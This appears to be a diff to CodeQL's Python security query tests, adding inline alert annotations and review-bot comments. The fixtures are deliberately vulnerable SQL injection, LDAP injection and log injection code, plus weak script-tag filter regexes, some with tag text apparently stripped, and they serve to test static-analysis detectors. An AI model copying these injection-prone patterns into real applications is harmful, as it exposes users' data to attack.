| sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:46:46:46:53 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:46:46:46:53 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:47:47:47:54 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:47:47:47:54 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:48:52:48:59 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:48:52:48:59 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:50:18:50:25 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:50:18:50:25 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:51:24:51:31 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:51:24:51:31 | ControlFlowNode for username | This SQL query depends on a $@. 
| sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | edges | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:21:24:21:77 | ControlFlowNode for BinaryExpr | provenance | | | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:24:38:24:95 | ControlFlowNode for BinaryExpr | provenance | | 
@@ -35,20 +52,3 @@ nodes | sqlalchemy_textclause.py:50:18:50:25 | ControlFlowNode for username | semmle.label | ControlFlowNode for username | | sqlalchemy_textclause.py:51:24:51:31 | ControlFlowNode for username | semmle.label | ControlFlowNode for username | subpaths -#select -| sql_injection.py:21:24:21:77 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:21:24:21:77 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | -| sql_injection.py:24:38:24:95 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:24:38:24:95 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | -| sql_injection.py:25:26:25:83 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:25:26:25:83 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | -| sql_injection.py:26:28:26:85 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:26:28:26:85 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:27:28:27:87 | ControlFlowNode for Attribute() | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:27:28:27:87 | ControlFlowNode for Attribute() | This SQL query depends on a $@. 
| sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:31:50:31:72 | ControlFlowNode for Attribute() | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:31:50:31:72 | ControlFlowNode for Attribute() | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:41:26:41:33 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:41:26:41:33 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:42:31:42:38 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:42:31:42:38 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:43:30:43:37 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:43:30:43:37 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:44:35:44:42 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:44:35:44:42 | ControlFlowNode for username | This SQL query depends on a $@. 
| sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:45:41:45:48 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:45:41:45:48 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:46:46:46:53 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:46:46:46:53 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:47:47:47:54 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:47:47:47:54 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:48:52:48:59 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:48:52:48:59 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:50:18:50:25 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:50:18:50:25 | ControlFlowNode for username | This SQL query depends on a $@. 
| sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:51:24:51:31 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:51:24:51:31 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-089-SqlInjection/SqlInjection.qlref b/python/ql/test/query-tests/Security/CWE-089-SqlInjection/SqlInjection.qlref index d1d02cbe8d37..444c0e5f46aa 100644 --- a/python/ql/test/query-tests/Security/CWE-089-SqlInjection/SqlInjection.qlref +++ b/python/ql/test/query-tests/Security/CWE-089-SqlInjection/SqlInjection.qlref @@ -1 +1,2 @@ -Security/CWE-089/SqlInjection.ql +query: Security/CWE-089/SqlInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-089-SqlInjection/sql_injection.py b/python/ql/test/query-tests/Security/CWE-089-SqlInjection/sql_injection.py index c79bee16cb21..52aa3169616e 100644 --- a/python/ql/test/query-tests/Security/CWE-089-SqlInjection/sql_injection.py +++ b/python/ql/test/query-tests/Security/CWE-089-SqlInjection/sql_injection.py 
@@ -11,19 +11,19 @@ class User(models.Model): pass @app.route("/users/") -def show_user(username): +def show_user(username): # $ Source with connection.cursor() as cursor: # GOOD -- Using parameters cursor.execute("SELECT * FROM users WHERE username = %s", username) User.objects.raw("SELECT * FROM users WHERE username = %s", (username,)) # BAD -- Using string formatting - cursor.execute("SELECT * FROM users WHERE username = '%s'" % username) + cursor.execute("SELECT * FROM users WHERE username = '%s'" % username) # $ Alert # BAD -- other ways of executing raw SQL code with string interpolation - User.objects.annotate(RawSQL("insert into names_file ('name') values ('%s')" % username)) - User.objects.raw("insert into names_file ('name') values ('%s')" % username) - User.objects.extra("insert into names_file ('name') values ('%s')" % username) + User.objects.annotate(RawSQL("insert into names_file ('name') values ('%s')" % username)) # $ Alert + User.objects.raw("insert into names_file ('name') values ('%s')" % username) # $ Alert + User.objects.extra("insert into names_file ('name') values ('%s')" % username) # $ Alert # BAD (but currently no custom query to find this) # diff --git a/python/ql/test/query-tests/Security/CWE-089-SqlInjection/sqlalchemy_textclause.py b/python/ql/test/query-tests/Security/CWE-089-SqlInjection/sqlalchemy_textclause.py index a54d64517d42..f35b1325366c 100644 --- a/python/ql/test/query-tests/Security/CWE-089-SqlInjection/sqlalchemy_textclause.py +++ b/python/ql/test/query-tests/Security/CWE-089-SqlInjection/sqlalchemy_textclause.py 
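Review bot: The known false negative at the end of this hunk, `# BAD (but currently no custom query to find this)`, carries no inline expectation, so the gap is recorded only as prose. The statement it describes lies below the hunk and is not visible here. If it is real code, mark that line `# $ MISSING: Alert` so the test reports it once the SQL injection query starts covering the case. The body of `show_user` continues outside the hunk.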
@@ -20,15 +20,15 @@ class User(Base): @app.route("/users/") -def show_user(username): +def show_user(username): # $ Source session = sqlalchemy.orm.Session(engine) # BAD, normal SQL injection - stmt = sqlalchemy.text("SELECT * FROM users WHERE username = '{}'".format(username)) + stmt = sqlalchemy.text("SELECT * FROM users WHERE username = '{}'".format(username)) # $ Alert results = session.execute(stmt).fetchall() # BAD, allows SQL injection - username_formatted_for_sql = sqlalchemy.text("'{}'".format(username)) + username_formatted_for_sql = sqlalchemy.text("'{}'".format(username)) # $ Alert stmt = sqlalchemy.select(User).where(User.username == username_formatted_for_sql) results = session.execute(stmt).scalars().all() @@ -38,14 +38,14 @@ def show_user(username): # All of these should be flagged by query - t1 = sqlalchemy.text(username) - t2 = sqlalchemy.text(text=username) - t3 = sqlalchemy.sql.text(username) - t4 = sqlalchemy.sql.text(text=username) - t5 = sqlalchemy.sql.expression.text(username) - t6 = sqlalchemy.sql.expression.text(text=username) - t7 = sqlalchemy.sql.expression.TextClause(username) - t8 = sqlalchemy.sql.expression.TextClause(text=username) - - t9 = db.text(username) - t10 = db.text(text=username) + t1 = sqlalchemy.text(username) # $ Alert + t2 = sqlalchemy.text(text=username) # $ Alert + t3 = sqlalchemy.sql.text(username) # $ Alert + t4 = sqlalchemy.sql.text(text=username) # $ Alert + t5 = sqlalchemy.sql.expression.text(username) # $ Alert + t6 = sqlalchemy.sql.expression.text(text=username) # $ Alert + t7 = sqlalchemy.sql.expression.TextClause(username) # $ Alert + t8 = sqlalchemy.sql.expression.TextClause(text=username) # $ Alert + + t9 = db.text(username) # $ Alert + t10 = db.text(text=username) # $ Alert diff --git a/python/ql/test/query-tests/Security/CWE-090-LdapInjection/LdapInjection.expected b/python/ql/test/query-tests/Security/CWE-090-LdapInjection/LdapInjection.expected index 20170029899e..ae30a38acc32 100644 
--- a/python/ql/test/query-tests/Security/CWE-090-LdapInjection/LdapInjection.expected
+++ b/python/ql/test/query-tests/Security/CWE-090-LdapInjection/LdapInjection.expected
@@ -1,3 +1,14 @@ +#select +| ldap3_bad.py:21:17:21:18 | ControlFlowNode for dn | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:21:17:21:18 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap3_bad.py:21:21:21:33 | ControlFlowNode for search_filter | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:21:21:21:33 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap3_bad.py:38:9:38:10 | ControlFlowNode for dn | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:38:9:38:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap3_bad.py:38:13:38:25 | ControlFlowNode for search_filter | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:38:13:38:25 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap_bad.py:21:9:21:10 | ControlFlowNode for dn | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:21:9:21:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap_bad.py:21:33:21:45 | ControlFlowNode for search_filter | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:21:33:21:45 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. 
| ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap_bad.py:37:9:37:10 | ControlFlowNode for dn | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:37:9:37:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap_bad.py:37:33:37:45 | ControlFlowNode for search_filter | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:37:33:37:45 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap_bad.py:55:9:55:10 | ControlFlowNode for dn | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:55:9:55:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap_bad.py:55:43:55:55 | ControlFlowNode for search_filter | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:55:43:55:55 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | edges | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:1:19:1:25 | ControlFlowNode for request | provenance | | | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:1:19:1:25 | ControlFlowNode for request | provenance | | 
@@ -108,14 +119,3 @@ nodes | ldap_bad.py:55:9:55:10 | ControlFlowNode for dn | semmle.label | ControlFlowNode for dn | | ldap_bad.py:55:43:55:55 | ControlFlowNode for search_filter | semmle.label | ControlFlowNode for search_filter | subpaths -#select -| ldap3_bad.py:21:17:21:18 | ControlFlowNode for dn | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:21:17:21:18 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap3_bad.py:21:21:21:33 | ControlFlowNode for search_filter | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:21:21:21:33 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap3_bad.py:38:9:38:10 | ControlFlowNode for dn | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:38:9:38:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap3_bad.py:38:13:38:25 | ControlFlowNode for search_filter | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:38:13:38:25 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap_bad.py:21:9:21:10 | ControlFlowNode for dn | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:21:9:21:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap_bad.py:21:33:21:45 | ControlFlowNode for search_filter | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:21:33:21:45 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. 
| ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap_bad.py:37:9:37:10 | ControlFlowNode for dn | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:37:9:37:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap_bad.py:37:33:37:45 | ControlFlowNode for search_filter | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:37:33:37:45 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap_bad.py:55:9:55:10 | ControlFlowNode for dn | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:55:9:55:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap_bad.py:55:43:55:55 | ControlFlowNode for search_filter | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:55:43:55:55 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-090-LdapInjection/LdapInjection.qlref b/python/ql/test/query-tests/Security/CWE-090-LdapInjection/LdapInjection.qlref index 19112f987ada..87db0e58f847 100644 --- a/python/ql/test/query-tests/Security/CWE-090-LdapInjection/LdapInjection.qlref +++ b/python/ql/test/query-tests/Security/CWE-090-LdapInjection/LdapInjection.qlref @@ -1 +1,2 @@ -Security/CWE-090/LdapInjection.ql +query: Security/CWE-090/LdapInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/python/ql/test/query-tests/Security/CWE-090-LdapInjection/ldap3_bad.py b/python/ql/test/query-tests/Security/CWE-090-LdapInjection/ldap3_bad.py index 2edb986fccfc..a69aef9ad3d8 100644 --- a/python/ql/test/query-tests/Security/CWE-090-LdapInjection/ldap3_bad.py +++ b/python/ql/test/query-tests/Security/CWE-090-LdapInjection/ldap3_bad.py @@ -1,4 +1,4 @@ -from flask import request, Flask +from flask import request, Flask # $ Source import ldap3 app = Flask(__name__) @@ -18,7 +18,7 @@ def normal(): srv = ldap3.Server('ldap://127.0.0.1') conn = ldap3.Connection(srv, user=dn, auto_bind=True) - conn.search(dn, search_filter) + conn.search(dn, search_filter) # $ Alert @app.route("/direct") @@ -35,7 +35,7 @@ def direct(): srv = ldap3.Server('ldap://127.0.0.1') conn = ldap3.Connection(srv, user=dn, auto_bind=True).search( - dn, search_filter) + dn, search_filter) # $ Alert # if __name__ == "__main__": # app.run(debug=True) diff --git a/python/ql/test/query-tests/Security/CWE-090-LdapInjection/ldap_bad.py b/python/ql/test/query-tests/Security/CWE-090-LdapInjection/ldap_bad.py index 133b0baaf9c0..8fd38f52f577 100644 --- a/python/ql/test/query-tests/Security/CWE-090-LdapInjection/ldap_bad.py +++ b/python/ql/test/query-tests/Security/CWE-090-LdapInjection/ldap_bad.py @@ -1,4 +1,4 @@ -from flask import request, Flask +from flask import request, Flask # $ Source import ldap app = Flask(__name__) @@ -18,7 +18,7 @@ def normal(): ldap_connection = ldap.initialize("ldap://127.0.0.1") user = ldap_connection.search_s( - dn, ldap.SCOPE_SUBTREE, search_filter) + dn, ldap.SCOPE_SUBTREE, search_filter) # $ Alert @app.route("/direct") @@ -34,7 +34,7 @@ def direct(): search_filter = "(user={})".format(unsafe_filter) user = ldap.initialize("ldap://127.0.0.1").search_s( - dn, ldap.SCOPE_SUBTREE, search_filter) + dn, ldap.SCOPE_SUBTREE, search_filter) # $ Alert @app.route("/normal_argbyname") 
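Review bot: `# $ Source` sits on the `from flask import request, Flask` line in ldap3_bad.py, which reads as if the import statement were the untrusted input. The same placement is used in ldap_bad.py, LogInjectionBad.py and pam_test.py. It matches the `ImportMember` source location in the .expected rows, but a reader cannot tell from the annotation which `request` reads feed each sink. Consider a short explanation in front of the annotation, following the `# Bad # $ Alert` form used elsewhere in this patch, e.g. `from flask import request, Flask  # reported source for every route below  # $ Source`.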
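Review bot: The single `# $ Alert` on `conn.search(dn, search_filter)` stands for two findings, because LdapInjection.expected lists both a DN row and a filter row for ldap3_bad.py line 21. The same holds for line 38 and for the three `search_s` calls in ldap_bad.py. Whether one annotation pins both results depends on the post-processing query, which is not visible here, so a regression that drops only the DN or only the filter result may be caught by the .expected file alone. Say so next to the annotation, for example `conn.search(dn, search_filter)  # DN and filter are both sinks  # $ Alert`. `normal()` begins outside the hunk.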
@@ -52,7 +52,7 @@ def normal_argbyname(): ldap_connection = ldap.initialize("ldap://127.0.0.1") user = ldap_connection.search_s( - dn, ldap.SCOPE_SUBTREE, filterstr=search_filter) + dn, ldap.SCOPE_SUBTREE, filterstr=search_filter) # $ Alert # if __name__ == "__main__": diff --git a/python/ql/test/query-tests/Security/CWE-113-HeaderInjection/Tests2-with-wsgi-validator/HeaderInjection.expected b/python/ql/test/query-tests/Security/CWE-113-HeaderInjection/Tests2-with-wsgi-validator/HeaderInjection.expected index e217064d1dfc..58f42bec0c84 100644 --- a/python/ql/test/query-tests/Security/CWE-113-HeaderInjection/Tests2-with-wsgi-validator/HeaderInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-113-HeaderInjection/Tests2-with-wsgi-validator/HeaderInjection.expected @@ -1,4 +1,4 @@ +#select edges nodes subpaths -#select diff --git a/python/ql/test/query-tests/Security/CWE-113-HeaderInjection/Tests2-with-wsgi-validator/HeaderInjection.qlref b/python/ql/test/query-tests/Security/CWE-113-HeaderInjection/Tests2-with-wsgi-validator/HeaderInjection.qlref index 7dbe28e4b591..4379f3d416b4 100644 --- a/python/ql/test/query-tests/Security/CWE-113-HeaderInjection/Tests2-with-wsgi-validator/HeaderInjection.qlref +++ b/python/ql/test/query-tests/Security/CWE-113-HeaderInjection/Tests2-with-wsgi-validator/HeaderInjection.qlref @@ -1 +1,2 @@ -Security/CWE-113/HeaderInjection.ql \ No newline at end of file +query: Security/CWE-113/HeaderInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-116-BadTagFilter/BadTagFilter.qlref b/python/ql/test/query-tests/Security/CWE-116-BadTagFilter/BadTagFilter.qlref index e5fc84fd48a9..443c007de0cb 100644 --- a/python/ql/test/query-tests/Security/CWE-116-BadTagFilter/BadTagFilter.qlref +++ b/python/ql/test/query-tests/Security/CWE-116-BadTagFilter/BadTagFilter.qlref 
@@ -1 +1,2 @@ -Security/CWE-116/BadTagFilter.ql +query: Security/CWE-116/BadTagFilter.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-116-BadTagFilter/tst.py b/python/ql/test/query-tests/Security/CWE-116-BadTagFilter/tst.py index 2c3ec0667e39..51aa659282bc 100644 --- a/python/ql/test/query-tests/Security/CWE-116-BadTagFilter/tst.py +++ b/python/ql/test/query-tests/Security/CWE-116-BadTagFilter/tst.py 
@@ -1,28 +1,28 @@ import re filters = [ - re.compile(r""".*?<\/script>""", re.IGNORECASE), # NOT OK - doesn't match newlines or `` - re.compile(r""".*?<\/script>""", re.IGNORECASE | re.DOTALL), # NOT OK - doesn't match `` + re.compile(r""".*?<\/script>""", re.IGNORECASE), # NOT OK - doesn't match newlines or `` # $ Alert + re.compile(r""".*?<\/script>""", re.IGNORECASE | re.DOTALL), # NOT OK - doesn't match `` # $ Alert re.compile(r""".*?<\/script[^>]*>""", re.IGNORECASE | re.DOTALL), # OK re.compile(r"""""", re.IGNORECASE | re.DOTALL), # OK - we don't care regexps that only match comments re.compile(r""")|([^\/\s>]+)[\S\s]*?>"""), #// NOT OK - doesn't match comments with the right capture groups - re.compile(r"""<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))"""), # NOT OK - capture groups - re.compile(r"""(<[a-z\/!$]("[^"]*"|'[^']*'|[^'">])*>|)""", re.IGNORECASE), # NOT OK - capture groups - re.compile(r"""<(?:(?:!--([\w\W]*?)-->)|(?:!\[CDATA\[([\w\W]*?)\]\]>)|(?:!DOCTYPE([\w\W]*?)>)|(?:\?([^\s\/<>]+) ?([\w\W]*?)[?/]>)|(?:\/([A-Za-z][A-Za-z0-9\-_\:\.]*)>)|(?:([A-Za-z][A-Za-z0-9\-_\:\.]*)((?:\s+[^"'>]+(?:(?:"[^"]*")|(?:'[^']*')|[^>]*))*|\/|\s+)>))"""), # NOT OK - capture groups + re.compile(r"""]*>([\s\S]*?)<\/script>""", re.IGNORECASE | re.DOTALL), # NOT OK - too strict matching on the end tag # $ Alert + re.compile(r"""<(?:!--([\S|\s]*?)-->)|([^\/\s>]+)[\S\s]*?>"""), #// NOT OK - doesn't match comments with the right capture groups # $ Alert + re.compile(r"""<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))"""), # NOT OK - capture groups # $ Alert + re.compile(r"""(<[a-z\/!$]("[^"]*"|'[^']*'|[^'">])*>|)""", re.IGNORECASE), # NOT OK - capture groups # $ Alert + re.compile(r"""<(?:(?:!--([\w\W]*?)-->)|(?:!\[CDATA\[([\w\W]*?)\]\]>)|(?:!DOCTYPE([\w\W]*?)>)|(?:\?([^\s\/<>]+) 
?([\w\W]*?)[?/]>)|(?:\/([A-Za-z][A-Za-z0-9\-_\:\.]*)>)|(?:([A-Za-z][A-Za-z0-9\-_\:\.]*)((?:\s+[^"'>]+(?:(?:"[^"]*")|(?:'[^']*')|[^>]*))*|\/|\s+)>))"""), # NOT OK - capture groups # $ Alert ] doFilters(filters) diff --git a/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjection.expected b/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjection.expected index fd9b5fe6bb65..67274311bf42 100644 --- a/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjection.expected 
@@ -1,3 +1,8 @@ +#select +| LogInjectionBad.py:18:21:18:40 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:18:21:18:40 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | +| LogInjectionBad.py:24:18:24:37 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:24:18:24:37 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | +| LogInjectionBad.py:30:25:30:44 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:30:25:30:44 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | +| LogInjectionBad.py:37:19:37:38 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:37:19:37:38 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | edges | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for request | provenance | | | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for request | LogInjectionBad.py:17:12:17:18 | ControlFlowNode for request | provenance | | 
